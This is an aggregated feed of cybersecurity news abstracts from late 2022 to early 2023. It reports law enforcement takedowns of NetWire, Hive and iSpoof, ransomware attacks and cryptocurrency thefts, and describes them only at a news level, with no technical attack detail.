Abstract An international law enforcement operation seized the infrastructure associated with the NetWire RAT and resulted in the arrest of its administrator. A coordinated international law enforcement operation resulted in the seizure of the infrastructure...

Security Affairs

March 10, 2023

International Law Enforcement Takes Down Infamous NetWire Cross-Platform RAT Full Text

Abstract A coordinated international law enforcement exercise has taken down the online infrastructure associated with a cross-platform remote access trojan (RAT) known as NetWire . Coinciding with the seizure of the sales website www.worldwiredlabs[.]com, a Croatian national who is suspected to be the website's administrator has been arrested. While the suspect's name was not released, investigative journalist Brian Krebs  identified  Mario Zanko as the owner of the domain. "NetWire is a licensed commodity RAT offered in underground forums to non-technical users to carry out their own criminal activities," Europol's European Cybercrime Center (EC3)  said  in a tweet. Advertised  since   at least 2012 , the malware is typically distributed via  malspam campaigns  and gives a remote attacker complete control over a Windows, macOS, or Linux system. It also comes with password-stealing and keylogging capabilities. The U.S. Department of Justice (DoJ)  said  an investiga

The Hacker News

March 9, 2023

Researchers Uncover Email Threats From Exotic Lily Full Text

Abstract Exotic Lily is an initial access broker who specializes in gathering credentials from high-value targets through employee impersonation, deep open-source intelligence (OSINT), and by creating convincing malicious documents.

Cyware

March 9, 2023

8220 Gang used new ScrubCrypt crypter in recent cryptojacking attacks Full Text

Abstract A threat actor tracked as 8220 Gang has been spotted using a new crypter called ScrubCrypt in cryptojacking campaigns. Fortinet researchers observed the mining group 8220 Gang using a new crypter called ScrubCrypt in cryptojacking attacks. "Between...

Security Affairs

March 08, 2023

Lazarus Group Exploits Zero-Day Vulnerability to Hack South Korean Financial Entity Full Text

Abstract The North Korea-linked  Lazarus Group  has been observed weaponizing flaws in an undisclosed software to breach a financial business entity in South Korea twice within a span of a year. While the first attack in May 2022 entailed the use of a vulnerable version of a certificate software that's widely used by public institutions and universities, the re-infiltration in October 2022 involved the exploitation of a zero-day in the same program. Cybersecurity firm AhnLab Security Emergency Response Center (ASEC)  said  it's refraining from mentioning the software owing to the fact that "the vulnerability has not been fully verified yet and a software patch has not been released." The adversarial collective, after obtaining an initial foothold by an unknown method, abused the zero-day bug to perform lateral movement, shortly after which the AhnLab V3 anti-malware engine was disabled via a  BYOVD attack . It's worth noting here that the Bring Your Own Vulnerable Dr

The Hacker News

March 7, 2023

Vice Society Ransomware Group Claims Hamburg University of Applied Sciences as Latest Victim Full Text

Abstract The university warned that “significant amounts of data from various areas” were copied, including usernames and “cryptographically secured” passwords, email addresses, and mobile phone numbers.

Cyware

March 6, 2023

European police dismantled the DoppelPaymer ransomware gang Full Text

Abstract German police announced to have dismantled an international cybercrime gang behind the DoppelPaymer ransomware operation. Europol has announced that an international operation conducted by law enforcement in Germany and Ukraine, with help of the US FBI and the Dutch...

Security Affairs

March 06, 2023

Core Members of DoppelPaymer Ransomware Gang Targeted in Germany and Ukraine Full Text

Abstract Law enforcement authorities from Germany and Ukraine have targeted suspected core members of a cybercrime group that has been behind large-scale attacks using DoppelPaymer ransomware. The operation, which took place on February 28, 2023, was carried out with support from the Dutch National Police (Politie) and the U.S. Federal Bureau of Investigation (FBI), according to Europol. This encompassed a raid of a German national's house as well as searches in the Ukrainian cities of Kiev and Kharkiv. A Ukrainian national was also interrogated. Both individuals are believed to have taken up crucial positions in the DoppelPaymer group. "Forensic analysis of the seized equipment is still ongoing to determine the exact role of the suspects and their links to other accomplices," the agency further  said . DoppelPaymer , according to cybersecurity firm CrowdStrike, emerged in April 2019 and shares most of its code with another ransomware strain known as BitPaymer, which is attri

The Hacker News

March 01, 2023

Cybercriminals Targeting Law Firms with GootLoader and FakeUpdates Malware Full Text

Abstract Six different law firms were targeted in January and February 2023 as part of two disparate threat campaigns distributing  GootLoader  and  FakeUpdates  (aka SocGholish) malware strains. GootLoader , active since late 2020, is a first-stage downloader that's capable of delivering a wide range of secondary payloads such as Cobalt Strike and ransomware. It notably  employs  search engine optimization (SEO) poisoning to funnel victims searching for business-related documents toward drive-by download sites that drop the JavaScript malware. In the  campaign  detailed by cybersecurity company eSentire, the threat actors are said to have compromised legitimate, but vulnerable, WordPress websites and added new blog posts without the owners' knowledge. "When the computer user navigates to one of these malicious web pages and hits the link to download the purported business agreement, they are unknowingly downloading GootLoader," eSentire researcher Keegan Keplinger  said

The Hacker News

February 27, 2023

Dutch Police arrests 3 men involved in a massive extortion scheme. One of them is an ethical hacker Full Text

Abstract The Dutch police arrested three individuals as a result of an investigation into computer trespass, data theft, extortion, extortion, and money laundering. The Dutch police announced the arrest of three men as the result of an extensive investigation...

Security Affairs

February 27, 2023

Dutch Police Arrest 3 Hackers Involved in Massive Data Theft and Extortion Scheme Full Text

Abstract The Dutch police announced the arrest of three individuals in connection with a "large-scale" criminal operation involving data theft, extortion, and money laundering. The suspects include two 21-year-old men from Zandvoort and Rotterdam and an 18-year-old man without a permanent residence. The arrests were made on January 23, 2023. It's estimated that the hackers stole personal data belonging to tens of millions of individuals. This comprised names, addresses, telephone numbers, dates of birth, bank account numbers, credit cards, passwords, license plates, social security numbers, and passport details. The Politie said its cybercrime team started the investigation nearly two years ago, in March 2021, after a large Dutch company suffered a security breach. The name of the company was not disclosed but some of the firms that were hit by a cyber attack around that time included  RDC ,  Shell , and  Ticketcounter , the last of which was also a victim of an extortion att

The Hacker News

February 27, 2023

Russian cybercrime alliances upended by Ukraine invasion Full Text

Abstract According to researchers, the so-called "brotherhood" of Russian-speaking cybercriminals is yet another casualty of the war in Ukraine, albeit one that few outside of Moscow are mourning.

Cyware

February 24, 2023

The alleged author of NLBrute Malware was extradited to US from Georgia Full Text

Abstract Dariy Pankov, a Russian VXer behind the NLBrute malware, has been extradited to the United States from Georgia. The Russian national Dariy Pankov, aka dpxaker, is suspected to be the author of the NLBrute malware. The man has been extradited to the United...

Security Affairs

February 21, 2023

HardBit ransomware gang adjusts their demands so the insurance company would cover the ransom cost Full Text

Abstract Recently emerged HardBit ransomware gang adjusts their demands so the insurance company would cover the ransom cost. The HardBit ransomware group first appeared on the threat landscape in October 2022, but unlike other ransomware operations, it doesn't...

Security Affairs

February 20, 2023

Norway Seizes $5.84 Million in Cryptocurrency Stolen by Lazarus Hackers Full Text

Abstract Norwegian police agency Økokrim has announced the seizure of 60 million NOK (about $5.84 million) worth of cryptocurrency stolen by the Lazarus Group in March 2022 following the Axie Infinity Ronin Bridge hack. "This case shows that we also have a great capacity to follow the money on the blockchain, even if the criminals use advanced methods," the agency  said  in a statement. The development comes more than 10 months after the U.S. Treasury Department  implicated  the North Korea-backed hacking group for the theft of $620 million from the Ronin cross-chain bridge. Then in September 2022, the U.S. government  announced  the recovery of more than $30 million worth of cryptocurrency, representing 10% of the stolen funds. Økokrim said it worked with international law enforcement partners to follow and piece together the money trail, thereby making it more difficult for criminal actors to carry out money laundering activities. "This is money that can support North Kor

The Hacker News

February 20, 2023

Spain Orders Extradition of British Alleged Hacker to US Full Text

Abstract Spain’s National Court has agreed to the extradition to the US of a British citizen who allegedly took part in computer attacks, including the July 2020 hacking of Twitter accounts of public figures such as Joseph Biden, Barack Obama, and Bill Gates.

Cyware

February 9, 2023

US and UK sanctioned seven Russian members of Trickbot gang Full Text

Abstract The US and the UK have sanctioned seven Russian individuals for their involvement in the TrickBot operations. The US and the UK authorities have sanctioned seven Russian individuals for their involvement in the TrickBot operations. The US Treasury...

Security Affairs

February 9, 2023

Experts published a list of proxy IPs used by the pro-Russia group Killnet Full Text

Abstract SecurityScorecard’s researchers released a list of proxy IPs used by the pro-Russia group Killnet to neutralize its attacks. SecurityScorecard’s researchers published a list of proxy IPs used by the pro-Russia group Killnet with the intent to interfere...

Security Affairs

February 8, 2023

Russian national pleads guilty to money laundering linked to Ryuk Ransomware operation Full Text

Abstract A Russian national pleaded guilty in the U.S. to money laundering charges linked to the Ryuk ransomware operation. On February 7, 2023, Russian national Denis Mihaqlovic Dubnikov (30) pleaded guilty in the U.S. to one count of conspiracy to commit...

Security Affairs

February 8, 2023

Hong Kong police and Interpol uncover servers used by global phishing syndicate Full Text

Abstract Bogus apps impersonated banks, media players, and others to steal data from victims’ smartphones. Registered subscribers for servers were individuals in mainland China, the Philippines, and Cambodia.

Cyware

February 08, 2023

Russian Hacker Pleads Guilty to Money Laundering Linked to Ryuk Ransomware Full Text

Abstract A Russian national on February 7, 2023, pleaded guilty in the U.S. to money laundering charges and for attempting to conceal the source of funds obtained in connection with Ryuk ransomware attacks. Denis Mihaqlovic Dubnikov, 30, was  arrested  in Amsterdam in November 2021 before he was extradited from the Netherlands in August 2022. He is awaiting sentencing on April 11, 2023. "Between at least August 2018 and August 2021, Dubnikov and his co-conspirators laundered the proceeds of Ryuk ransomware attacks on individuals and organizations throughout the United States and abroad," the Department of Justice (DoJ)  said . Dubnikov and his accomplices are said to have engaged in various criminal schemes designed to obscure the trail of the ill-gotten proceeds. According to DoJ, a chunk of the 250 Bitcoin ransom paid by a U.S. company in July 2019 after a Ryuk attack was sent to Dubnikov in exchange for about $400,000. The crypto was subsequently converted to Tether and trans

The Hacker News

February 07, 2023

Encrypted Messaging App Exclu Used by Criminal Groups Cracked by Joint Law Enforcement Full Text

Abstract A joint law enforcement operation conducted by Germany, the Netherlands, and Poland has cracked yet another encrypted messaging application named  Exclu  used by organized crime groups. Eurojust, in a press statement,  said  the February 3 exercise resulted in the arrests of 45 individuals across Belgium and the Netherlands, some of whom include users as well as the administrators and owners of the service, Authorities also launched raids in 79 locations, leading to the seizure of €5.5 million in cash, 300,000 ecstasy tablets, 20 firearms, and 200 phones. Two drug laboratories have further been shut down. Investigation into Exlcu is said to have commenced in Germany as far back as June 2020. The application, prior to its takedown, had an estimated 3,000 users, of which 750 are Dutch speakers. The Politie, in an announcement of its own, noted that it was able to gain covert access to the service, permitting the agency to read messages sent by its users for the past five months. &

The Hacker News

February 06, 2023

Microsoft: Iranian Nation-State Group Sanctioned by U.S. Behind Charlie Hebdo Hack Full Text

Abstract An Iranian nation-state group sanctioned by the U.S. government has been attributed to the hack of the French satirical magazine Charlie Hebdo in early January 2023. Microsoft, which disclosed details of the incident, is tracking the activity cluster under its chemical element-themed moniker  NEPTUNIUM , which is an Iran-based company known as Emennet Pasargad. In January 2022, the U.S. Federal Bureau of Investigation (FBI)  tied  the state-backed cyber unit to a sophisticated influence campaign carried out to  interfere  with the 2020 presidential elections. Two Iranian nationals have been accused for their role in the disinformation and threat campaign. Microsoft's disclosure comes after a "hacktivist" group named Holy Souls (now identified as NEPTUNIUM) claimed to be in possession of the personal information of more than 200,000 Charlie Hebdo customers, including their full names, telephone numbers, and home and email addresses. The breach, which allowed NEPTUNIU

The Hacker News

February 6, 2023

Finland’s Most-Wanted Hacker Nabbed in France Full Text

Abstract In late October 2022, Julius “Zeekill” Kivimäki was charged (and “arrested in absentia,” according to the Finns) with attempting to extort money from the Vastaamo Psychotherapy Center.

Cyware

January 29, 2023

Alleged member of ShinyHunters group extradited to the US, could face 116 years in jail Full Text

Abstract An alleged member of the ShinyHunters cybercrime gang has been extradited from Morocco to the United States. Sebastien Raoult, a French national who is suspected of being a member of ShinyHunters cybercrime gang known as "Seyzo Kaizen," has been extradited...

Security Affairs

January 28, 2023

Copycat Criminals mimicking Lockbit gang in northern Europe Full Text

Abstract Recent reports of Lockbit locker-based attacks against North European SMBs indicate that local crooks started using Lockbit locker variants. Executive Summary During the past months, the Lockbit gang reached very high popularity in the underground...

Security Affairs

January 27, 2023

Justice Department Thwarts ‘Hive’ Ransomware Scheme Full Text

Abstract The Justice Department announces a successful campaign countering ransomware attacks by the Hive cybercriminal network.

Lawfare

January 27, 2023

Hacker accused of having stolen personal data of all Austrians and more Full Text

Abstract A Dutch hacker who was arrested at the end of last year claims to have stolen the personal data of almost all Austrians.  At the end of November 2022, the Amsterdam police arrested a 25-year-old man from Almere who is suspected of having stolen...

Security Affairs

January 27, 2023

BlackCat Ransomware gang stole secret military data from an industrial explosives manufacturer Full Text

Abstract The BlackCat Ransomware group claims to have hacked SOLAR INDUSTRIES INDIA and to have stolen 2TB of "secret military data." The BlackCat Ransomware gang added SOLAR INDUSTRIES INDIA to the list of victims published on its Tor leak site. The company...

Security Affairs

January 27,2023

Experts Uncover the Identity of Mastermind Behind Golden Chickens Malware Service Full Text

Abstract Cybersecurity researchers have discovered the real-world identity of the threat actor behind  Golden Chickens  malware-as-a-service, who goes by the online persona "badbullzvenom." eSentire's Threat Response Unit (TRU), in an exhaustive report published following a 16-month-long investigation,  said  it "found multiple mentions of the badbullzvenom account being shared between two people." The second threat actor, known as Frapstar, is said to identify themselves as "Chuck from Montreal," enabling the cybersecurity firm to piece together the criminal actor's digital footprint. This includes his real name, pictures, home address, the names of his parents, siblings, and friends, along with his social media accounts and his interests. He is also said to be the sole proprietor of a small business that's run from his own home. Golden Chickens, also known as  Venom Spider , is a malware-as-a-service (MaaS) provider that's linked to a variet

The Hacker News

January 26,2023

Hive Ransomware Infrastructure Seized in Joint International Law Enforcement Effort Full Text

Abstract In what's a case of hacking the hackers, the darknet infrastructure associated with the Hive ransomware-as-a-service (RaaS) operation has been seized as part of a coordinated law enforcement effort involving 13 countries. "Law enforcement identified the decryption keys and shared them with many of the victims, helping them regain access to their data without paying the cybercriminals," Europol  said  in a statement. The U.S. Department of Justice (DoJ)  said  the Federal Bureau of Investigation (FBI) covertly infiltrated the Hive database servers in July 2022 and captured 336 decryption keys that were then handed over to companies compromised by the gang, effectively saving $130 million in ransom payments. The FBI also distributed more than 1,000 additional decryption keys to previous Hive victims, the DoJ noted, stating the agency gained access to two dedicated servers and one virtual private server at a hosting provider in California that were leased using three em

The Hacker News

January 26, 2023

Dutch police arrest man who ‘stole private info belonging to tens of millions’ Full Text

Abstract The 25-year-old now faces charges of violating data privacy and computer trespassing laws, and laundering cryptocurrency valued at around $491,000, according to media reports.

Cyware

January 26, 2023

Hive Ransomware Tor leak site apparently seized by law enforcement Full Text

Abstract The leak site of the Hive ransomware gang was seized due to an international operation conducted by law enforcement in ten countries. The Tor leak site used by Hive ransomware operators has been seized as part of an international operation conducted...

Security Affairs

January 24,2023

FBI Says North Korean Hackers Behind $100 Million Horizon Bridge Crypto Theft Full Text

Abstract The U.S. Federal Bureau of Investigation (FBI) on Monday confirmed that North Korean threat actors were responsible for the theft of $100 million in cryptocurrency assets from  Harmony Horizon Bridge  in June 2022. The law enforcement agency attributed the hack to the  Lazarus Group  and APT38 (aka BlueNoroff, Copernicium, and Stardust Chollima), the latter of which is a North Korean state-sponsored threat group that specializes in financial cyber operations. The FBI further stated the Harmony intrusion leveraged an attack campaign dubbed  TraderTraitor  that was disclosed by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in April 2022. The modus operandi entailed utilizing social engineering tricks to deceive employees of cryptocurrency companies into downloading rogue applications as part of a seemingly benign recruitment effort. "On Friday, January 13, 2023, North Korean cyber actors used RAILGUN, a privacy protocol, to launder over $60 million worth of

The Hacker News

January 23, 2023

PLAY Ransomware Group Claims Attack on Britain’s Arnold Clark Full Text

Abstract Sensitive personal data allegedly stolen from Arnold Clark, one of the United Kingdom’s largest car dealerships, has been posted online by the PLAY ransomware group on its extortion site.

Cyware

January 19,2023

Bitzlato Crypto Exchange Founder Arrested for Aiding Cybercriminals Full Text

Abstract The U.S. Department of Justice (DoJ) on Wednesday announced the arrest of Anatoly Legkodymov (aka Gandalf and Tolik), the cofounder of Hong Kong-registered cryptocurrency exchange Bitzlato, for allegedly processing $700 million in illicit funds. The 40-year-old Russian national, who was arrested in Miami, was charged in a U.S. federal court with "conducting a money transmitting business that transported and transmitted illicit funds and that failed to meet U.S. regulatory safeguards, including anti-money laundering requirements," the DoJ  said . According to court documents, Bitzlato is said to have advertised itself as a virtual currency exchange with minimal identification requirements for its users, breaking the rules requiring the vetting of customers. This lack of know your customer (KYC) enforcement led to the service becoming a "haven for criminal proceeds" and facilitating transactions worth more than $700 million on the Hydra darknet marketplace prior

The Hacker News

January 16, 2023

Europol arrested cryptocurrency scammers that stole millions from victims Full Text

Abstract An international police operation led by Europol led to the arrest of cryptocurrency scammers targeting users all over the world. An international law enforcement operation conducted by authorities from Bulgaria, Cyprus, Germany and Serbia, supported...

Security Affairs

January 16, 2023

Undercover with the Leader of Lockbit Full Text

Abstract LockBitSupp’s focus on professionalizing the group is part of the reason why Lockbit has found such success in the cybercriminal world – the group accounted for 44 percent of the total ransomware attacks launched last year.

Cyware

January 15, 2023

Hacker stole credit cards from the website of Canada’s largest alcohol retailer LCBO Full Text

Abstract The Canadian Liquor Control Board of Ontario (LCBO), the largest beverage alcohol retailer in the country, disclosed Magecart attack. Canadian Liquor Control Board of Ontario (LCBO), the largest beverage alcohol retailer in the country, disclosed...

Security Affairs

January 13,2023

Cybercriminals Using Polyglot Files in Malware Distribution to Fly Under the Radar Full Text

Abstract Remote access trojans such as StrRAT and Ratty are being distributed as a combination of polyglot and malicious Java archive ( JAR ) files, once again highlighting how threat actors are continuously finding new ways to fly under the radar. "Attackers now use the polyglot technique to confuse security solutions that don't properly validate the JAR file format," Deep Instinct security researcher Simon Kenin  said  in a report. Polyglot files  are files that combine syntax from two or more different formats in a manner such that each format can be parsed without raising any error. One such 2022 campaign spotted by the cybersecurity firm is the use of JAR and MSI formats – i.e., a file that's valid both as a JAR and an MSI installer – to deploy the StrRAT payload. This also means that the file can be executed by both Windows and Java Runtime Environment (JRE) based on how it's interpreted. Another instance involves the use of CAB and JAR polyglots to deliver bot

The Hacker News

January 9, 2023

Hive Ransomware Gang Leaked 550 GB Stolen From Consulate Health Care Full Text

Abstract The Hive ransomware gang this week added the company to its Tor leak site, threatening to publish the stolen data. The gang states that the attack took place on December 3rd, 2022 and the attack was disclosed on January 6, 2023.

Cyware

January 5, 2023

Threat actors stole Slack private source code repositories Full Text

Abstract Enterprise collaboration platform Slack disclosed a data breach, hackers stole some of its private source code repositories. The enterprise collaboration platform Slack has announced to have suffered a security breach, threat actors have stolen some...

Security Affairs

January 05,2023

Bluebottle Cybercrime Group Preys on Financial Sector in French-Speaking African Nations Full Text

Abstract A cybercrime group dubbed Bluebottle has been linked to a set of targeted attacks against the financial sector in Francophone countries located in Africa from at least July 2022 to September 2022. "The group makes extensive use of living-off-the-land, dual use tools, and commodity malware, with no custom malware deployed in this campaign," Symantec, a division of Broadcom Software,  said  in a report shared with The Hacker News. The cybersecurity firm said the activity shares overlaps with a threat cluster tracked by Group-IB under the name  OPERA1ER , which has carried out dozens of attacks aimed at banks, financial services, and telecom companies in Africa, Asia, and Latin America between 2018 and 2022. The attribution stems from similarities in the toolset used, the attack infrastructure, the absence of bespoke malware, and the targeting of French-speaking nations in Africa. Three different unnamed financial institutions in three African nations were breached, although

The Hacker News

January 1, 2023

Lockbit apologized for the attack on the SickKids pediatric hospital and releases a free decryptor Full Text

Abstract The LockBit ransomware group formally apologized for the attack on the Hospital for Sick Children (SickKids) and gave to the victim a decryptor for free. The LockBit ransomware gang formally apologized for the attack on the Hospital for Sick Children...

Security Affairs

December 30, 2022

Multiple Malware For Sale on Darkweb Forums Full Text

Abstract Researchers have spotted a new threat group, dubbed PureCoder, selling multiple malware, including miners, information stealers, and crypters, on the dark web. Recently, Italian cyber security agency TG Soft identified that the PureLogs information stealer was used by Alibaba2044 threat actors ... Read More

Cyware

December 28, 2022

30 Million Railway Customers’ Data for Sale On the Dark Web Full Text

Abstract Username, email, verified and verified mobile numbers, gender, city Id, City Name, state Id, and language preferences are among the data. Sample data by actor includes a number of records containing emails and phone numbers.

Cyware

December 28, 2022

Hackers Steal Power Utility Customer Data Full Text

Abstract A law firm handling breach notification for Sargent & Lundy estimates the hackers stole the personal data of more than 6,900 individuals. The Black Basta ransomware gang surfaced in April 2022. The group is known for using double-extortion tactics.

Cyware

December 27, 2022

Hackers stole $3 million worth of cryptocurrency from BTC.com Full Text

Abstract The BTC.com cryptocurrency platform was the victim of a cyberattack that resulted in the theft of $3 million worth of crypto assets. BTC.com is a website that provides services for managing and transferring Bitcoin, it offers a digital wallet for storing...

Security Affairs

December 27, 2022

Hackers steal $8 million from users running trojanized BitKeep apps Full Text

Abstract Multiple BitKeep crypto wallet users reported that their wallets were emptied during Christmas after hackers triggered transactions that didn't require verification.

BleepingComputer

December 27, 2022

North Korean Hackers Steal NFTs via Phishing Websites Full Text

Abstract The attackers set up nearly 500 decoy sites, including that of a project associated with the World Cup, and NFT marketplaces OpenSea, X2Y2 and Rarible. They made off with $365,000 by stealing 1,055 NFTs with just one of those phishing addresses.

Cyware

December 26, 2022

Hacker claims to be selling Twitter data of 400 million users Full Text

Abstract A threat actor claims to be selling public and private data of 400 million Twitter users scraped in 2021 using a now-fixed API vulnerability. They're asking $200,000 for an exclusive sale.

BleepingComputer

December 26, 2022

Hackers Drain $8M in Assets from Bitkeep Wallets in Latest DeFi Exploit Full Text

Abstract One suspected hacker wallet address already has more than $5 million in digital assets. While the amount exploited is still not final and the attackers are still currently transferring funds to multiple wallet addresses.

Cyware

December 25, 2022

Vice Society Adds Custom-branded Payload PolyVice to its Arsenal Full Text

Abstract The Vice Society ransomware group spun another custom ransomware variant, dubbed PolyVice. The strain deploys a robust encryption scheme that uses NTRUEncrypt and ChaCha20-Poly1305 algorithms. The authors of this new ransomware variant are also likely selling similar payloads to other hacking group ... Read More

Cyware

December 23, 2022

Vice Society Group May Have Outsourced the Development of ‘PolyVice’ Ransomware Full Text

Abstract Researchers say it's likely that the group behind the custom-branded PolyVice ransomware for Vice Society is also selling similar payloads to other groups. It implements a robust encryption scheme, using NTRUEncrypt and ChaCha20-Poly1305 algorithms.

Cyware

December 22, 2022

Vice Society ransomware gang is using a custom locker Full Text

Abstract The Vice Society ransomware group has adopted new custom ransomware, with a strong encryption scheme, in recent intrusions. SentinelOne researchers discovered that the Vice Society ransomware gang has started using a custom ransomware that implements...

Security Affairs

December 22, 2022

North Korea-linked hackers stole $626 million in virtual assets in 2022 Full Text

Abstract North Korea-linked threat actors have stolen an estimated $1.2 billion worth of cryptocurrency and other virtual assets in the past five years. South Korea’s spy agency, the National Intelligence Service, estimated that North Korea-linked threat...

Security Affairs

December 21, 2022

Russian Killnet Hacker Group Claims Data Theft of 10,000 FBI Agents Full Text

Abstract The Russian hacker group, KillNet, claims to have infiltrated an FBI database, allegedly stealing the personal information of more than 10,000 US federal agents. Like their other attacks, this alleged hack also appears to have political undertones.

Cyware

December 20, 2022

Ransomware gang uses new Microsoft Exchange exploit to breach servers Full Text

Abstract Play ransomware threat actors are using a new exploit chain that bypasses ProxyNotShell URL rewrite mitigations to gain remote code execution (RCE) on vulnerable servers through Outlook Web Access (OWA).

BleepingComputer

December 20, 2022

Infamous hacker steals 14 BAYCs worth over $1 million Full Text

Abstract According to @serpent, the hacker contacted the victim and asked to license IP rights for BAYC #2060. They claimed to be a casting director for Forte Pictures, an L. A based Emmy Award-winning company. The alias the scammer used was fake.

Cyware

December 20, 2022

Google Ad fraud campaign used adult content to make millions Full Text

Abstract A massive advertising fraud campaign using Google Ads and 'popunders' on adult sites is estimated to have generated millions of ad impressions on stolen articles, making the fraudsters an estimated $275k per month.

BleepingComputer

December 15, 2022

FBI seized 48 domains linked to DDoS-for-Hire service platforms Full Text

Abstract The U.S. Department of Justice (DoJ) seized forty-eight domains that offered DDoS-for-Hire Service Platforms to crooks. The U.S. Department of Justice (DoJ) this week announced the seizure of 48 domains associated with the DDoS-for-Hire Service platforms...

Security Affairs

December 14, 2022

FBI seized domains linked to 48 DDoS-for-hire service platforms Full Text

Abstract The US Department of Justice has seized 48 Internet domains and charged six suspects for their involvement in running 'Booter' or 'Stresser' platforms that allow anyone to easily conduct distributed denial of service attacks.

BleepingComputer

December 14, 2022

The Dark Web is Getting Darker - Ransomware Thrives on Illegal Markets Full Text

Abstract The dark web is getting darker as cybercrime gangs increasingly shop their malware, phishing, and ransomware tools on illegal cybercrime markets.

BleepingComputer

December 13, 2022

Lockbit ransomware gang hacked California Department of Finance Full Text

Abstract LockBit ransomware gang hacked the California Department of Finance and threatens to leak data stolen from its systems. The LockBit ransomware gang claims to have stolen 76Gb from the California Department of Finance and is threatening to leak the stolen...

Security Affairs

December 09, 2022

Australia arrests ‘Pig Butchering’ suspects for stealing $100 million Full Text

Abstract The Australian Federal Police (AFP) have arrested four suspected members of a financial investment scam syndicate estimated to have stolen $100 million from victims worldwide.

BleepingComputer

December 8, 2022

Cybercriminals Attacking Each Other Gives Defenders Access to Inside Info Full Text

Abstract Researchers discovered a new sub-economy linked to cybercriminal activity: hackers scamming each other for millions of dollars. This practice led to the apparition of arbitration rooms in forums to settle conflicts.

Cyware

December 08, 2022

Automated dark web markets sell corporate email accounts for $2 Full Text

Abstract Cybercrime marketplaces are increasingly selling stolen corporate email addresses for as low as $2 to fill a growing demand by hackers who use them for business email compromise and phishing attacks or initial access to networks.

BleepingComputer

December 7, 2022

Ransomware group Vice Society targeted dozens of schools in 2022, new report finds Full Text

Abstract More than 40 educational organizations, including 15 in the United States, suffered ransomware attacks launched by the cybercriminal group known as Vice Society, researchers at Palo Alto Networks revealed in a report published Tuesday.

Cyware

December 07, 2022

CryptosLabs ‘pig butchering’ ring stole up to $505 million since 2018 Full Text

Abstract A previously unknown investment scam group named 'CryptosLabs' has stolen up to €480 million ($505 million) from victims in France, Belgium, and Luxembourg, since the launch of its operation in 2018.

BleepingComputer

December 06, 2022

Suspects arrested for hacking US networks to steal employee data Full Text

Abstract Four men suspected of hacking into US networks to steal employee data for identity theft and the filing of fraudulent US tax returns have been arrested in London, UK, and Malmo, Sweden, at the request of the U.S. law enforcement authorities.

BleepingComputer

December 5, 2022

India: Hackers Selling Personal Data Of 150,000 Patients From Tamil Nadu Hospital On Dark Web Full Text

Abstract The seller shared a sample as proof, showing data records dated from the years 2007-2011. The data set of 150,000 records of patients' information includes their name, guardian name, date of birth, doctor's details, and address information.

Cyware

December 5, 2022

DuckLogs Advertises its Features and MaaS Capabilities on Cybercrime Forums Full Text

Abstract Cyble research team has unearthed a new MaaS operation dubbed DuckLogs. It reportedly offers beginners and other cyber attackers easy access to malicious modules. DuckLogs mainly includes an information stealer and a RAT component. The malware is most likely distributed using spam or phishing email ... Read More

Cyware

December 3, 2022

Cybercriminal Organizations Offer Record High Reward for Signal App Zero-Days Full Text

Abstract The market for gray-market exploit brokers is growing and a majority of credit can be given to an ongoing bidding war wherein a new entrant has bid in millions for Signal messaging app zero-days. The reasons behind this bidding war include an overwhelming 80% market share of Android in Ukraine and ... Read More

Cyware

December 2, 2022

Cuba Ransomware received over $60M in Ransom payments as of August 2022 Full Text

Abstract Cuba ransomware gang received more than $60 million in ransom payments related to attacks against 100 entities worldwide as of August 2022. The threat actors behind the Cuba ransomware (aka COLDDRAW, Tropical Scorpius) have demanded over 145 million...

Security Affairs

December 02, 2022

Police arrest 55 members of ‘Black Panthers’ SIM Swap gang Full Text

Abstract The Spanish National Police have arrested 55 members of the 'Black Panthers' cybercrime group, including one of the organization's leaders based in Barcelona.

BleepingComputer

December 2, 2022

Ransomware group may have stolen customer bank details from British water company Full Text

Abstract The affected details include the names and addresses associated with customers’ accounts as well as the bank details used to set up direct debit payments. The company said it is writing letters to the affected customers.

The Record

Dec 02, 2022

Cuba Ransomware Extorted Over $60 Million in Ransom Fees from More than 100 Entities Full Text

Abstract The threat actors behind Cuba (aka COLDDRAW) ransomware have received more than $60 million in ransom payments and compromised over 100 entities across the world as of August 2022. In a new advisory shared by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI), the agencies  highlighted  a "sharp increase in both the number of compromised U.S. entities and the ransom amounts." The ransomware crew, also known as  Tropical Scorpius , has been observed targeting financial services, government facilities, healthcare, critical manufacturing, and IT sectors, while simultaneously expanding its tactics to gain initial access and interact with breached networks. It's worth noting that despite the name "Cuba," there is no evidence to suggest that the actors have any connection or affiliation with the island country. The entry point for the attacks involves the exploitation of known security flaws, phishing,

The Hacker News

December 1, 2022

New Exploit Broker on the Scene Pays Premium for Signal App Zero-Days Full Text

Abstract Russia-based OpZero went on the record recently with a $1.5 million offer for Signal remote code execution (RCE) exploits, more than tripling the relatively stable high-water mark for that app offered by American firm Zerodium.

Dark Reading

November 29, 2022

Spanish police dismantle operation that made €12M via investment scams Full Text

Abstract Spanish National Police have dismantled a cybercrime organization that used fake investment sites to defraud over €12.3 million ($12.8 million) from 300 victims across Europe.

BleepingComputer

November 29, 2022

North Carolina College Confirms Ransomware Group Stole Sensitive Data Full Text

Abstract A spokesperson for the college said the attack occurred in October and law enforcement was immediately notified. The school disconnected its systems and hired outside security experts to help restore systems and investigate the incident.

The Record

November 26, 2022

Ransomware gang targets Belgian municipality, hits police instead Full Text

Abstract The Ragnar Locker ransomware gang has published stolen data from what they thought was the municipality of Zwijndrecht, but turned out to be stolen from Zwijndrecht police, a local police unit in Antwerp, Belgium.

BleepingComputer

November 25, 2022

An international police operation dismantled the spoofing service iSpoof Full Text

Abstract An international law enforcement operation has dismantled an online phone number spoofing service called iSpoof. An international law enforcement operation that was conducted by authorities in Europe, Australia, the United States, Ukraine, and Canada,...

Security Affairs

November 25, 2022

U.K. Police Arrest 142 in Global Crackdown on ‘iSpoof’ Phone Spoofing Service Full Text

Abstract A coordinated law enforcement effort has dismantled an online phone number spoofing service called  iSpoof  and arrested 142 individuals linked to the operation. The websites, ispoof[.]me and ispoof[.]cc, allowed the crooks to "impersonate trusted corporations or contacts to access sensitive information from victims," Europol  said  in a press statement. Worldwide losses exceeded €115 million ($ 119.8 million), with over 200,000 potential victims believed to have been directly targeted through iSpoof in the U.K. alone, the Metropolitan Police  noted .  Among the 142 people arrested is the administrator of the website, who was apprehended in the U.K. on November 6, 2022. The website and its server were subsequently seized and taken offline two days later by Ukrainian and U.S. agencies. Per the National Police Corps, the helpdesk fraud  allowed  registered subscribers on the online portal to mask their phone numbers and make calls impersonating banks, retail companies, an

The Hacker News

November 25, 2022

